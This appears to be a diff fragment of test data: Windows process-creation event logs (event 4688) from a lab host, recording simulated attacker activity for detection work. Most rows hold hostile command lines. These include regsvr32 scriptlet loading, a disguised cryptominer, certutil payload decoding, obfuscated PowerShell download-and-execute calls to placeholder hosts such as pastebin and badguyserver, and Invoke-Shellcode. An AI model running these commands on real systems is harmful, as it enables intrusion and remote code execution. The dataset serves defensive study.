+80,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.410,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xa5c,C:\Windows\System32\net1.exe,%%1936,0x2a8,C:\Windows\system32\net1  user adm1nistrator Bob_testing /add,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.410
+81,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.503,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xfc0,C:\Windows\System32\net.exe,%%1936,0xbc8,"net  share TestShare=c:\testshare /Grant:Users,Read",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.503
+82,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.517,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x10b8,C:\Windows\System32\net1.exe,%%1936,0xfc0,"C:\Windows\system32\net1  share TestShare=c:\testshare /Grant:Users,Read",C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.517
+83,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.543,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x132c,C:\Windows\System32\Dism.exe,%%1936,0x77c,dism /online /enable-feature /featurename:File-Services /NoRestart,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.543
+84,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.550,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x4e8,C:\Windows\System32\conhost.exe,%%1936,0x132c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\Dism.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.550
+85,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:03.830,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xcd8,C:\Windows\System32\net.exe,%%1936,0xbc8,net  use q: \\MSTICAlertsWin1\TestShare Bob_testing /User:adm1nistrator,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.830
+86,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:03.850,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x97c,C:\Windows\Temp\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\DismHost.exe,%%1936,0x132c,C:\Windows\TEMP\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04},C:\Windows\System32\Dism.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:03.850
+87,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:04.507,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\servicing\TrustedInstaller.exe,%%1936,0x230,C:\Windows\servicing\TrustedInstaller.exe,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:04.507
+88,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:05.193,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xe68,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\TiWorker.exe,%%1936,0x280,C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\TiWorker.exe -Embedding,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:05.193
+89,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:08.723,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x12fc,C:\Windows\System32\net.exe,%%1936,0xbc8,net  use q: /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:08.723
+90,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.667,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xc18,C:\Windows\System32\net.exe,%%1936,0xbc8,net  share TestShare /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.667
+91,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.683,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Windows\System32\net1.exe,%%1936,0xc18,C:\Windows\system32\net1  share TestShare /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.683
+92,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.707,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1274,C:\Windows\System32\net.exe,%%1936,0xbc8,net  user adm1nistrator /delete,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.707
+93,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.730,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x614,C:\Windows\System32\net1.exe,%%1936,0x1274,C:\Windows\system32\net1  user adm1nistrator /delete,C:\Windows\System32\net.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.730
+94,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:10.753,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xd10,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.753
+95,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:10.817,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\svchost.exe,%%1936,0x230,C:\Windows\system32\svchost.exe -k wsappx,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:10.817
+96,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.190,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x135c,C:\Windows\System32\win32calc.exe,%%1936,0xd10,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\regsvr32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.190
+97,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.260,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x103c,C:\Diagnostics\UserTmp\suchost.exe,%%1936,0xbc8,.\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.260
+98,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.347,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1014,C:\Windows\System32\win32calc.exe,%%1936,0x103c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\suchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.347
+99,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.413,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xbb4,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.413
+100,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x11cc,C:\Windows\System32\win32calc.exe,%%1936,0xbb4,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.493
+101,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.537,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.537
+102,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.617,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x132c,C:\Windows\System32\win32calc.exe,%%1936,0x123c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.617
+103,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.930,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x156c,C:\Windows\System32\win32calc.exe,%%1936,0x154c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.930
+104,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.977,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1580,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.977
+105,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.053,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15a0,C:\Windows\System32\win32calc.exe,%%1936,0x1580,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.053
+106,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.100,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15b4,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell.exe  -c ""$a = 'Download'+'String'+""(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))"";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\evil.ps1;""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.100
+107,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.173,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15d4,C:\Windows\System32\win32calc.exe,%%1936,0x15b4,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.173
+108,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.220,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x15e8,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(""{2}{0}{1}""-f ':/','/paste','tp')+'bin/'+'raw/'+(""{1}{0}""-f'Em17','pqCw')));}",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.220
+109,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.287,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1608,C:\Windows\System32\win32calc.exe,%%1936,0x15e8,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.287
+110,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x161c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c "".\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\Users\$env:UserName\AppData\Local\Temp\kittens1.jpg';""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.337
+111,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.407,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x163c,C:\Windows\System32\win32calc.exe,%%1936,0x161c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.407
+112,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.453,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1650,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd   /c "".\n^e^t u^se^r""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.453
+113,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.517,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1670,C:\Windows\System32\win32calc.exe,%%1936,0x1650,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.517
+114,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.567,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1684,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.567
+115,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.633,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16a4,C:\Windows\System32\win32calc.exe,%%1936,0x1684,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.633
+116,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.683,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16b8,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.683
+117,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.747,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16d8,C:\Windows\System32\win32calc.exe,%%1936,0x16b8,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.747
+118,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.793,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16ec,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.793
+119,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:13.867,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x170c,C:\Windows\System32\win32calc.exe,%%1936,0x16ec,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:13.867
+120,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.767,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0xa08,C:\Diagnostics\UserTmp\certutil.exe,%%1936,0xbc8,certutil  -decode delme.b64 implant.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.767
+121,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.833,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x4e8,C:\Windows\System32\win32calc.exe,%%1936,0xa08,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\certutil.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.833
+122,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:11.947,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe  k111,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:11.947
+123,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.003,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1250,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe  81ed03caf6901e444c72ac67d192fb9c,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.003
+124,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.067,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x140c,C:\Diagnostics\UserTmp\implant.exe,%%1936,0xbc8,implant.exe  -b -t -m,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.067
+125,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.123,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x142c,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme"" ",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.123
+126,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.160,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1448,C:\Windows\System32\win32calc.exe,%%1936,0x140c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.160
+127,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1450,C:\Windows\System32\win32calc.exe,%%1936,0x240,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.167
+128,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1458,C:\Windows\System32\win32calc.exe,%%1936,0x1250,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\implant.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.167
+129,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.337,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1498,C:\Windows\System32\win32calc.exe,%%1936,0x142c,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.337
+130,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.393,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14ac,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,".\powershell  -Noninteractive -Noprofile -Command ""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.393
+131,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.460,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14cc,C:\Windows\System32\win32calc.exe,%%1936,0x14ac,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\powershell.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.460
+132,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:12.513,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x14e0,C:\Diagnostics\UserTmp\powershell.exe,%%1936,0xbc8,.\powershell  Invoke-Shellcode.ps1,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:12.513
+133,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:15.673,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\sppsvc.exe,%%1936,0x230,C:\Windows\system32\sppsvc.exe,C:\Windows\System32\services.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:15.673
+134,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:16.060,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13a8,C:\Windows\System32\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\system32\wbem\wmiprvse.exe -Embedding,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:16.060
+135,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:35:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:35:26.010
